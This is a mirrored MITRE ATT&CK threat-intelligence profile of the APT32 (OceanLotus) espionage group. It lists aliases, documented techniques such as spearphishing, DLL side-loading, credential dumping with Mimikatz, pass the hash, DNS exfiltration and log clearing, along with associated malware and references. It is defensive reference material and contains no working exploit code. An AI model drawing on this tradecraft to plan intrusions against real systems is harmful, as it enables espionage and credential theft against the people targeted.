Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Поиск
Вход Регистрация
MITRE ATT&CK - Преступная группа APT32
Риски
Каталоги
MITRE ATT&CK
Преступная группа
APT32
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

APT32

APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)
ID: G0050
Associated Groups: BISMUTH, Canvas Cyclone, OceanLotus, APT-C-00, SeaLotus
Version: 3.0
Created: 14 Dec 2017
Last Modified: 17 Apr 2024

Associated Group Descriptions
Name Description
BISMUTH (Citation: Microsoft Threat Actor Naming July 2023)
Canvas Cyclone (Citation: Microsoft Threat Actor Naming July 2023)
OceanLotus (Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
APT-C-00 (Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)
SeaLotus (Citation: Cybereason Oceanlotus May 2017)

Techniques Used
Domain ID Name Use
Enterprise T1087 .001 Account Discovery: Local Account

APT32 enumerated administrative users using the commands net localgroup administrators.(Citation: Cybereason Cobalt Kitty 2017)
Enterprise T1583 .001 Acquire Infrastructure: Domains

APT32 has set up and operated websites to gather information and deliver malware.(Citation: Volexity Ocean Lotus November 2020)
.006 Acquire Infrastructure: Web Services

APT32 has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017)
.003 Application Layer Protocol: Mail Protocols

APT32 has used email for C2 via an Office macro.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
.003 Command and Scripting Interpreter: Windows Command Shell

APT32 has used cmd.exe for execution.(Citation: Cybereason Cobalt Kitty 2017)

.005 Command and Scripting Interpreter: Visual Basic

APT32 has used macros, COM scriptlets, and VBS scripts.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)

.007 Command and Scripting Interpreter: JavaScript

APT32 has used JavaScript for drive-by downloads and C2 communications.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence.(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
Enterprise T1585 .001 Establish Accounts: Social Media Accounts

APT32 has set up Facebook pages in tandem with fake websites.(Citation: Volexity Ocean Lotus November 2020)
Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.(Citation: ESET OceanLotus Mar 2019)
Enterprise T1222 .002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

APT32's macOS backdoor changes the permission of the file it wants to execute to 755.(Citation: ESET OceanLotus macOS April 2019)
Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.(Citation: Amnesty Intl. Ocean Lotus February 2021)
Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

APT32's macOS backdoor hides the clientID file via a chflags function.(Citation: ESET OceanLotus macOS April 2019)
.003 Hide Artifacts: Hidden Window

APT32 has used the WindowStyle parameter to conceal PowerShell windows. (Citation: FireEye APT32 May 2017) (Citation: Cybereason Cobalt Kitty 2017)

.004 Hide Artifacts: NTFS File Attributes

APT32 used NTFS alternate data streams to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1574 .001 Hijack Execution Flow: DLL

APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT32 has cleared select event log entries.(Citation: FireEye APT32 May 2017)
.004 Indicator Removal: File Deletion

APT32's macOS backdoor can receive a “delete” command.(Citation: ESET OceanLotus macOS April 2019)

.006 Indicator Removal: Timestomp

APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID.(Citation: FireEye APT32 May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)

Enterprise T1056 .001 Input Capture: Keylogging

APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes.(Citation: Cybereason Cobalt Kitty 2017)
Enterprise T1036 .003 Masquerading: Rename Legitimate Utilities

APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade)
.004 Masquerading: Masquerade Task or Service

APT32 has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. APT32 has also impersonated the legitimate Flash installer file name "install_flashplayer.exe".(Citation: FireEye APT32 May 2017)

.005 Masquerading: Match Legitimate Resource Name or Location

APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe. (Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

APT32 has used the `Invoke-Obfuscation` framework to obfuscate their PowerShell.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: Cybereason Cobalt Kitty 2017)
.011 Obfuscated Files or Information: Fileless Storage

APT32's backdoor has stored its configuration in a registry key.(Citation: ESET OceanLotus Mar 2019)

.013 Obfuscated Files or Information: Encrypted/Encoded File

APT32 has performed code obfuscation, including encoding payloads using Base64 and using a framework called "Dont-Kill-My-Cat (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)

.016 Obfuscated Files or Information: Junk Code Insertion

APT32 includes garbage code to mislead anti-malware software and researchers.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)

Enterprise T1588 .002 Obtain Capabilities: Tool

APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)
Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)
.002 Phishing: Spearphishing Link

APT32 has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: FireEye APT32 April 2020)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)

Enterprise T1598 .003 Phishing for Information: Spearphishing Link

APT32 has used malicious links to direct users to web pages designed to harvest credentials.(Citation: Volexity Ocean Lotus November 2020)
Enterprise T1021 .002 Remote Services: SMB/Windows Admin Shares

APT32 used Net to use Windows' hidden network shares to copy their tools to remote machines for execution.(Citation: Cybereason Cobalt Kitty 2017)
Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

APT32 has used scheduled tasks to persist on victim systems.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
Enterprise T1505 .003 Server Software Component: Web Shell

APT32 has used Web shells to maintain access to victim websites.(Citation: Volexity OceanLotus Nov 2017)
Enterprise T1608 .001 Stage Capabilities: Upload Malware

APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.(Citation: Volexity Ocean Lotus November 2020)
.004 Stage Capabilities: Drive-by Target

APT32 has stood up websites containing numerous articles and content scraped from the Internet to make them appear legitimate, but some of these pages include malicious JavaScript to profile the potential victim or infect them via a fake software update.(Citation: Volexity Ocean Lotus November 2020)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

APT32 has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
.010 System Binary Proxy Execution: Regsvr32

APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017)

.011 System Binary Proxy Execution: Rundll32

APT32 malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1216 .001 System Script Proxy Execution: PubPrn

APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn)
Enterprise T1569 .002 System Services: Service Execution

APT32's backdoor has used Windows services as a way to execute its malicious payload. (Citation: ESET OceanLotus Mar 2019)
Enterprise T1552 .002 Unsecured Credentials: Credentials in Registry

APT32 used Outlook Credential Dumper to harvest credentials stored in Windows registry.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Enterprise T1550 .002 Use Alternate Authentication Material: Pass the Hash

APT32 has used pass the hash for lateral movement.(Citation: Cybereason Cobalt Kitty 2017)
.003 Use Alternate Authentication Material: Pass the Ticket

APT32 successfully gained remote access by using pass the ticket.(Citation: Cybereason Cobalt Kitty 2017)

Enterprise T1204 .001 User Execution: Malicious Link

APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)
.002 User Execution: Malicious File

APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)

Enterprise T1078 .003 Valid Accounts: Local Accounts

APT32 has used legitimate local admin account credentials.(Citation: FireEye APT32 May 2017)

Software
ID Name References Techniques
S0039 Net (Citation: Cybereason Cobalt Kitty 2017) (Citation: Microsoft Net Utility) (Citation: Savill 1999) Domain Account, Local Account, Domain Groups, System Service Discovery, Network Share Discovery, Additional Local or Domain Groups, SMB/Windows Admin Shares, Local Account, Domain Account, System Network Connections Discovery, Local Groups, Network Share Connection Removal, Password Policy Discovery, Remote System Discovery, Service Execution, System Time Discovery
S1078 RotaJakiro (Citation: RotaJakiro 2021 netlab360 analysis) (Citation: netlab360 rotajakiro vs oceanlotus) Boot or Logon Initialization Scripts, Standard Encoding, Shared Modules, Match Legitimate Resource Name or Location, Symmetric Cryptography, Automated Collection, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Process Discovery, Exfiltration Over C2 Channel, Inter-Process Communication, Non-Standard Port, Unix Shell Configuration Modification, Non-Application Layer Protocol, Systemd Service, XDG Autostart Entries
S0100 ipconfig (Citation: Cybereason Cobalt Kitty 2017) (Citation: TechNet Ipconfig) System Network Configuration Discovery
S0099 Arp (Citation: Cybereason Cobalt Kitty 2017) (Citation: TechNet Arp) System Network Configuration Discovery, Remote System Discovery
S0108 netsh (Citation: Cybereason Cobalt Kitty 2017) (Citation: TechNet Netsh) Disable or Modify System Firewall, Proxy, Security Software Discovery, Netsh Helper DLL
S0156 KOMPROGO (Citation: FireEye APT32 May 2017) Windows Management Instrumentation, System Information Discovery, Windows Command Shell
S0585 Kerrdown (Citation: Amnesty Intl. Ocean Lotus February 2021) (Citation: Unit 42 KerrDown February 2019) Encrypted/Encoded File, Malicious File, Spearphishing Link, Spearphishing Attachment, DLL, System Information Discovery, Deobfuscate/Decode Files or Information, Lateral Tool Transfer, Visual Basic, Ingress Tool Transfer, Malicious Link, Compression
S0155 WINDSHIELD (Citation: FireEye APT32 May 2017) System Owner/User Discovery, System Information Discovery, Non-Application Layer Protocol, Query Registry, File Deletion, Custom Command and Control Protocol
S0157 SOUNDBITE (Citation: FireEye APT32 May 2017) DNS, System Information Discovery, Application Window Discovery, Modify Registry, File and Directory Discovery
S0154 Cobalt Strike (Citation: Amnesty Intl. Ocean Lotus February 2021) (Citation: Cybereason Cobalt Kitty 2017) (Citation: Cybereason Oceanlotus May 2017) (Citation: FireEye APT32 May 2017) (Citation: Unit 42 KerrDown February 2019) (Citation: Volexity Ocean Lotus November 2020) (Citation: Volexity OceanLotus Nov 2017) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0154 Cobalt Strike (Citation: Cybereason Cobalt Kitty 2017) (Citation: Cybereason Oceanlotus May 2017) (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Cybereason Cobalt Kitty 2017) (Citation: Cybereason Oceanlotus May 2017) (Citation: Deply Mimikatz) (Citation: FireEye APT32 May 2017) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0352 OSX_OCEANLOTUS.D (Citation: Amnesty Intl. Ocean Lotus February 2021) (Citation: Backdoor.MacOS.OCEANLOTUS.F) (Citation: Trend Micro MacOS Backdoor November 2020) (Citation: TrendMicro MacOS April 2018) (Citation: Unit42 OceanLotus 2017) Standard Encoding, Linux and Mac File and Directory Permissions Modification, Shared Modules, Encrypted/Encoded File, Archive via Custom Method, Masquerade File Type, Symmetric Cryptography, System Checks, Gatekeeper Bypass, System Information Discovery, Data from Local System, Deobfuscate/Decode Files or Information, Archive via Library, Timestomp, Launch Daemon, System Network Configuration Discovery, Masquerade Task or Service, PowerShell, Unix Shell, Non-Standard Port, Non-Application Layer Protocol, Launch Agent, File Deletion, Software Packing, Web Protocols, Visual Basic, Ingress Tool Transfer, Hidden Files and Directories
S0477 Goopy (Citation: Cybereason Cobalt Kitty 2017) Scheduled Task, System Owner/User Discovery, DNS, Match Legitimate Resource Name or Location, DLL, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Clear Mailbox Data, Mail Protocols, Binary Padding, Junk Code Insertion, Indicator Removal, Process Discovery, Exfiltration Over C2 Channel, Disable or Modify Tools, Windows Command Shell, Web Protocols, Visual Basic
S0354 Denis (Citation: Cybereason Cobalt Kitty 2017) (Citation: Cybereason Oceanlotus May 2017) System Owner/User Discovery, Standard Encoding, DNS, System Checks, DLL, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Archive via Library, System Network Configuration Discovery, File and Directory Discovery, PowerShell, Hijack Execution Flow, Process Hollowing, Obfuscated Files or Information, Query Registry, Windows Command Shell, Command Obfuscation, File Deletion, Ingress Tool Transfer
S0158 PHOREAL (Citation: FireEye APT32 May 2017) Modify Registry, Non-Application Layer Protocol, Windows Command Shell, Custom Command and Control Protocol

References

  1. Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.
  2. Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
  3. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  4. Carr, N.. (2017, December 26). Nick Carr Status Update APT32 pubprn. Retrieved September 12, 2024.
  5. Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.
  6. Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.
  7. Carr, N. (2017, December 22). ItsReallyNick Status Update. Retrieved September 12, 2024.
  8. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  9. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  10. Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.
  11. Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.
  12. Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020.
  13. Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.
  14. Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.
  15. Mudge, R. (2014, July 14). Github Malleable-C2-Profiles safebrowsing.profile. Retrieved June 18, 2017.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.